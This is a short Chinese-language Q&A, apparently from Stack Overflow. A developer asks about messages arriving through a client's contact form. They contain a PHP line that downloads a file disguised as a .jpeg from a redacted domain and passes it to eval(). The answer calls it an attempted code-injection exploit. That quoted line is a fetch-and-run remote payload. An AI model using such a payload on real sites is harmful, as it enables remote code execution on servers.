我的客户告诉我,他经常在自己的邮箱(与自己网站上的联系表格链接)中收到这类信息:
$a = get_contents('.com.co//wp-admin/映像/pel.jpeg‘);eval('?>'.$a);
出于保密原因,我将url中的域名替换为*。get_contents函数的url中的域名对我们来说是未知的。
你知道会是什么吗?垃圾邮件?配置不好?提前感谢您的建议!
发布于 2021-06-02 09:37:46
这是一种利用(显然不存在的) 代码注入漏洞的企图。eval的使用是一种毫无意义的赠品。
https://stackoverflow.com/questions/67802518
复制相似问题